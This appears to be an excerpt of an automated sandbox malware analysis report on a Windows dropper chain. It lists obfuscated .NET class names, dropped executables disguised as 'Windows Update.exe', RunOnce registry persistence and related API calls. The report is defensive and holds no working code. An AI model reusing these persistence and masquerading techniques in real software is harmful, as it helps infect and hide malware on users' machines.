Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, zx6dUUhiYDT6ABhs6J/JXyHANreZqHXu3U7OK.cs	High entropy of concatenated method names: 'ACTXP3GOg0', 'swUXTMcUYP', 'xpXXxNfFh3', 'Qe4X1I0Q6a', 'EwuXKr7RhV', '.ctor', 'WdjKxYAVSHBoSgAwYAh', 'TPRC2dACbgB2EUlag6f', 'TBUXWLA6BVOpDx3RrF4', 'cW68N3AbH7Gn0hBj7wC'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.h8LBtNJWR7/Check.cs	High entropy of concatenated method names: 'OTPukA9jB0', 'hjNfMrPEYu6TCxGHqVI', 't9Kay3P2kLhpG1M7ete', 'rAmwV6PgGbjAQLLGV86', 'MDQHShPqUFDh4E0Rsk1', 'HOZXCePo7Scj0ZoE7wu', 'sg0DioPf00Lc8fdAgVF', 'K6fZmKP9PeyBmcpHlve', 'tonNXZPXtQEoUTLj4y8', 'LXlvmDPU1Zer9F2hWM4'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, w9w27qdF2JQYXqPwco/VZOv9gq5IfUd0bBp8d.cs	High entropy of concatenated method names: 'V5Q2E013y', 'kt4mB0uWw', '.ctor', 'C0HMwtKM5', 'XqUH4NWxv', 'rB6UBmArX', 'X9Eigl4Sc', 'V7e0LJbOY', 'A7xsgG7rg', 'b92GIxeds'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/WorkerProviders.cs	High entropy of concatenated method names: 'get_CreateParams', '.ctor', 'xEnQCPTGp', 'qkjle11hQ', 'sy6VcdYZO', 'Q9g65IfUd', 'zbBDp8dM9', 'O27NqF2JQ', 'WXqgPwcoj', 'Dispose'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.hWJ3R322hGjdADCEdTABkMzmNQKB5g3ZDFpbuz3Yy5a/UIDemoForm.cs	High entropy of concatenated method names: '.ctor', 'KTljuJuaR6', 'RkXjXddFNe', 'WKZjSoCLDd', 'jmOjBSbeaN', 'VOAjqGjsZw', 'gZ2jd4ByFd', 'qNxjFhc7d1', 'Dispose', 'boXjQyHANe'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	High entropy of concatenated method names: 'zTLj2wyOwE', 'wdLjmBCi6g', 'Nxbj3BYhiN', 'UGJjR0bft7', 'L4dj8cH9Bh', 'ibtjokU1o6', 'sSUjJK0WUK', 'oO2jANncFP', 'DpejarhlLf', 'a6kjwsShUe'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/VerifierProcedure.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'ObrjiJoLc', 'lv8uRe2tJ', 'Dispose', 'XFhXwyfOy', 'qQhv3gPHlTyBGMPA7C', 'jBiQ8H0NMecLVb4GjD', 'Ud2rHdL23TCMHxAAdY', 'alPPqXAVHncWZJmRYa'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, TB0uWwkXHEufsessia/d4yflyyfO5QE013y6t.cs	High entropy of concatenated method names: 'bw8jvZBu8K', 'AV1jb84K7a', 'XHFj73XccH', 'KcBjWLnQy2', 'E0Lj4rgRtw', 'KTEjn2AngP', '.ctor', '.cctor', 'fyBGBFGnxc7kUHx0e7F', 'OTu8FpGe5tb7MI5D9Ss'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.elBostagi/Sender.cs	High entropy of concatenated method names: '.ctor', 'getResponse', 'Encrypt', 'ISa5GKbXuHU5xU2QCxC', 'UE9PhPbUDCfht4L65of', 'uu5S1kbfwWfPc9rD7Co', 'xlYDmeb9B8nF8ZRR3yg', 'GXtc31bvMCp6V8bXh0M', 'cf66WbbkShSdWRToXAM', 'J967UqbJHlZ65cWVcKi'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs	High entropy of concatenated method names: '.cctor', 'A0N7UfjY4CN7a', 'XgYS6SdDWo', 'hbvSDWAGnc', 'werSNb84qN', 'dcgSgypVQY', 'VvpSENlVV3', 'fZrSpfthOb', 'S8vSyW8FJb', 'VWVSkB1b5F'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.h8LBtNJWR7/Check.cs	High entropy of concatenated method names: 'OTPukA9jB0', 'hjNfMrPEYu6TCxGHqVI', 't9Kay3P2kLhpG1M7ete', 'rAmwV6PgGbjAQLLGV86', 'MDQHShPqUFDh4E0Rsk1', 'HOZXCePo7Scj0ZoE7wu', 'sg0DioPf00Lc8fdAgVF', 'K6fZmKP9PeyBmcpHlve', 'tonNXZPXtQEoUTLj4y8', 'LXlvmDPU1Zer9F2hWM4'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, eYmxboi0HBiRoNSKMI/nwoe9FU0x43IxvZxru.cs	High entropy of concatenated method names: 'KGJuLj7xek', 'EMGuPmjev2', 'vcyuT5fA9O', '.ctor', 'LOtVwtPJOrpsxx1LDZu', 'dsARuaP8lY5pxQDWKbw', 'AOV2spPOGgst6Bf0uJc', 'cDd5Z8PvjWNecAWT92y', 'wTC48HPkprxSEd1Q3Fq', 'PtRXv2P53E1kFOAmtVv'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, FmYfDRtwHaOeqQio73/K5EQdS5vU2EiwnkmOp.cs	High entropy of concatenated method names: '.ctor', 'j2xXvxrnfM', 'z8yXbPm8gV', 'TWFX7wJf5I', 'QfXXW1douy', 'xB2Do1AEQ2lat4QKbZt', 'ilDIT9A2o6GP11jgbUW', 'uMwGI2AnfHPjKBQHNsC', 'MIfHToAeNMxEpwLRZxs', 'dviBSyAge42GFgK873g'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, VYs7xggG7rgj92Ixed/LrXI9ENgl4ScO7eLJb.cs	High entropy of concatenated method names: 'NdhjGHL6VM', 'litjCaDOkA', 'XQOjrsjc0n', 'XSZjhPV6Jt', 'L96j5g3l8r', 'uSTjtkujjH', '.ctor', 'R7nZpdsEy0FfowSHrfY', 'aSHHFws2AURsXPMQCqf', 'gpdVJFsgeFmaxvwciHO'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.FyQn7yEvAKMfXCA2smMK/Cryptor.cs	High entropy of concatenated method names: 'encrypt', 'decrypt', '.ctor', '.cctor', 'G7gRPAstQnksmbaL8k6', 'HNoW6YswUAUGLgya5Y5', 'fsP3C1suEpLFwxXgap9', 'QAZ5jEsNUcMUfN8NG2p', 'vujPXxsMhXW5SIIBjJS', 'BpRo7HspoSQspMuCWbZ'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, zx6dUUhiYDT6ABhs6J/JXyHANreZqHXu3U7OK.cs	High entropy of concatenated method names: 'ACTXP3GOg0', 'swUXTMcUYP', 'xpXXxNfFh3', 'Qe4X1I0Q6a', 'EwuXKr7RhV', '.ctor', 'WdjKxYAVSHBoSgAwYAh', 'TPRC2dACbgB2EUlag6f', 'TBUXWLA6BVOpDx3RrF4', 'cW68N3AbH7Gn0hBj7wC'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, FKM5IqDU4NWxvLB6Bm/s3iLKf6lkdHu7sr0Hw.cs	High entropy of concatenated method names: '.ctor', 'Ew1bvnMrk', 'IC07fZ5WV', 'WN6W9jlrF', 'TDRDxU6MmhUveb2fJ1K', 'hptLSU6pGwQcQn2MVwj', 'vGryxH6uFZJeaB0WsVD', 'lSq1cQ6NUA8ibK3xfTI', 'hCoDR26TQecQZpG1ng9', 'OOYNTp6yXrMUaNVQdUf'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, OT1UO78FqpHfaj3LJh/eryTP8RVkcWa6d2rXG.cs	High entropy of concatenated method names: 'kL57Ufjj3HtcK', '.ctor', '.cctor', 'gdgIHrdY5PWs5SYjdso', 'SLfp5qdIMhtXf9Hk0Tk', 'J0sa79dKyL2xyJXTfIm', 'aTE94md3RAtS21jrrvS', 'HSTBtBdH5HhgFBMt9uL', 'y8UE3Md40MIyqKIF60M', 'auCyojdxQhvTNWAMX3q'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sTGpkkBje11hQTy6cd/c69XCCSa4y8kcBUEnC.cs	High entropy of concatenated method names: 'juVxjo5ug', 'sel1P3iLK', 'YlkKdHu7s', '.ctor', 'uuoF7bVznqK6AE3DQXh', 'MmglAYVOSb66i5SsOek', 'Rx3RcQV5dlQL0PjrGPw', 'PmYJqpCQhO3VvyEUYn8', 'DJynR5CVlDuIPERQwSk', 'hbZUsVCC1TZGOEKrgDg'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.tRvRu7Jr5HML52Dh2xdYFfjVXH9w6pvwvL3pHS6q/OSFilter.cs	High entropy of concatenated method names: 'checkwindows', 'Getwindows', 'checkNET', 'GetMaxValue', 'Is32Bits', 'Is64Bits', 'IsWow64Process', 'kLVusis8ZA', 'HKLM_GetString', 'EDmxU30iJ3NZTRt1KSS'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, P8QpTkVVuVjo5ugPel/HdWG1slNbM1cXiS0LZ.cs	High entropy of concatenated method names: 'nb7eSNXHQ', 'pB1vlhulg', 'dPlbTw64WbOfEZL3qBH', 'Dm38X06xgrGP5s1JnYA', 'jERXFc6YoIQXB8tK5PN', 'GYZuFe6I1MkG2x0LxrJ', 'JbjiIH6Kqh7id8x81vV', 'USJ5a263NBH65i52Jiw', 'nNvXmq6HICu0W4J19Uf', 'RXIKbv6mECX7yxnqJcj'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, gZ24ByCFdkNxhc7d1j/gVmOSbGeaNOOAGjsZw.cs	High entropy of concatenated method names: 'frIuGPSPiE', 'bnkuCtf3KS', 'T4QurUa5ws', 'FYZuheJvM4', 'yxru5ERIqA', 'OKSutH7wdH', '.ctor', 'kE3h3ULQkLb3vgJym0j', 'TNOdKbLVwXrDB44b28K', 'sHEB6QLCyNgr4xVCWUk'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sNlFPXQyH5NurCceEr/bSZRdrFKIELkMaR5PM.cs	High entropy of concatenated method names: 'U7i9tP4KF', '.ctor', 'E0yQ7766GxOXFpQhimx', 'c39cwa6b2rroanM6w08', 'Y0VoGX6sls0o3NBkvTS', 'vyd8Ho6GHsxvaTGCDBY', 'zylINY6PwGULAt6gnhy', 'nr2B4T60g0H35bHcFG9', 'NC52oJ6LbKvkdMrHbXl', 'gCCuu06AsiRiJj0a1Y2'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, u9dnx1P24QV72TnMoO/PEX9lCLevoPVSukUXf.cs	High entropy of concatenated method names: '.ctor', 'AECujemKd0', 'MiAuuQuvrg', 'K9EuXOoYCu', 'PffuSK7ef0', 'jFdi8lPLG3egGSpUGGU', 'dcLQP5PAE1aRfl3ke6M', 'C1E8F3PPg0Pq5MQB1D7', 'tafVnxP0WdTkbubQtyQ', 'v0MRITPlHOJMUy5EeEh'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, J67kXdsdFNeZKZoCLD/K6TiT10kk04NoTlJua.cs	High entropy of concatenated method names: 'm5Guxxa6Ep', 'COuu1J2LEH', '.cctor', 'AcOJVN0I8OEg6dKr9xO', 'JrkqRL0KC3cOM0mGg5Q', 'o9W4x103rESvx4drUvn', 'vSJUiv0x181lXlGcFjY', 'sXw5ie0Ys9pM32lF0pZ', 'IfDLBZ0HTtjvKxJiX2V', 'KjBnkI0mpmEQ6SR0kR9'

Persistence and Installation Behavior:

Drops executable to a common third party application directory

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File written: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe

Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\postproc-52.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-IGHFO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	File created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	File created: C:\Users\user\AppData\Local\Temp\1ffxnzir.1cn\random.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-T1381.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-9KFTG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-685QJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-CUGLT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avdevice-53.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-O4BO6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	File created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe	Jump to dropped file
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	File created: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-3FQP6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-PVRDV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	File created: C:\Users\user\AppData\Local\Temp\nkn4qhlm.csu\autosubplayer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\swscale-2.dll (copy)	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	File created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\swresample-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avcodec-53.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-ESLKL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\I-Record.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File created: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-QLPAO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\AForge.Video.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-2J58U.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avfilter-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avformat-53.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avutil-51.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	File created: C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-L76RD.tmp	Jump to dropped file

Boot Survival:

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\i-record.lnk

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,	1_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004241A4 IsIconic,SetActiveWindow,	1_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004843A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	1_2_004843A8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	1_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,	1_2_0042F2F0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004175A8 IsIconic,GetCapture,	1_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00417CDE IsIconic,SetWindowPos,	1_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00417CE0

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

1_2_0041F128

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
